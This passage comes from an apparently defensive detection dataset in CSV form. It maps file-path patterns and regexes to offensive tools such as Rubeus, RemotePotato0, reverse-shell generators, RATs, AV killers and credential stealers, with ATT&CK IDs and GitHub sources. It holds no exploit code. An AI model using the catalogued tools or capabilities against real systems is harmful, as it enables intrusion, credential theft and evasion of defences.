- TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\ReflectiveDll.cpp*",".{0,1000}\\ReflectiveDll\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\ReflectiveLoader.cpp*",".{0,1000}\\ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\reg_recover-rs.exe*",".{0,1000}\\reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\reg-query.py*",".{0,1000}\\reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\regread.lua*",".{0,1000}\\regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\regwrite.lua*",".{0,1000}\\regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\regwritedel.lua*",".{0,1000}\\regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\Relay\Attacks\ShadowCred.cs*",".{0,1000}\\Relay\\Attacks\\ShadowCred\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\\RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\RemoteCamera.dll*",".{0,1000}\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*\RemoteHashRetrieval.ps1*",".{0,1000}\\RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\RemotePotato0.cpp*",".{0,1000}\\RemotePotato0\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0.sln*",".{0,1000}\\RemotePotato0\.sln.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0.zip*",".{0,1000}\\RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0-main.zip*",".{0,1000}\\RemotePotato0\-main\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0-main\*",".{0,1000}\\RemotePotato0\-main\\.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemoveItemCommand.cs",".{0,1000}\\RemoveItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\rentdrv.log*",".{0,1000}\\rentdrv\.log.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\request_shellcode.exe*",".{0,1000}\\request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ResolveDnsNameCommand.cs",".{0,1000}\\ResolveDnsNameCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Resources\Disks-NoEncryption.txt*",".{0,1000}\\Resources\\Disks\-NoEncryption\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*\resources\PROCEXP.sys*",".{0,1000}\\resources\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*\restoresig.py*",".{0,1000}\\restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*\reverse.exe*",".{0,1000}\\reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\ReverseProxy.dll*",".{0,1000}\\ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\reverse-shellcode.cpp*",".{0,1000}\\reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\reverse-ssh\*",".{0,1000}\\reverse\-ssh\\.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\revshell.py*",".{0,1000}\\revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*\revshell32.bin*",".{0,1000}\\revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\revshell64.bin*",".{0,1000}\\revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\revsocks\*.go*",".{0,1000}\\revsocks\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\revsocks\make.bat*",".{0,1000}\\revsocks\\make\.bat.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*\revsocks-master\*",".{0,1000}\\revsocks\-master\\.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\rfs_injection.exe*",".{0,1000}\\rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*\rid_hijack.rb*",".{0,1000}\\rid_hijack\.rb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\RID-Hijacking\*",".{0,1000}\\RID\-Hijacking\\.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\RID-Hijacking-master*",".{0,1000}\\RID\-Hijacking\-master.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\rm_injection.exe*",".{0,1000}\\rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ROADtools\*",".{0,1000}\\ROADtools\\.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*\Roblox Cookies.txt*",".{0,1000}\\Roblox\sCookies\.txt.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*\roboform\app\getCredsroboformapp.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\roboform\app\getCredsroboformapp2.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\roboform\app\getCredsroboformapp3.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\roboform\plugin\getCredsroboformplugin.h*",".{0,1000}\\roboform\\plugin\\getCredsroboformplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\RogueOxidResolver.cpp*",".{0,1000}\\RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RogueWinRM.sln*",".{0,1000}\\RogueWinRM\.sln.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*\RogueWinRM\*",".{0,1000}\\RogueWinRM\\.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*\Rootkit.cpp*",".{0,1000}\\Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\ROT Shellcode Encoder.csproj*",".{0,1000}\\ROT\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\rpcrt.py",".{0,1000}\\rpcrt\.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*\rpt_win.exe",".{0,1000}\\rpt_win\.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\rsocx.exe*",".{0,1000}\\rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*\rt_hijacking.exe*",".{0,1000}\\rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Rubeus.*",".{0,1000}\\Rubeus\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Rubeus\*",".{0,1000}\\Rubeus\\.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential 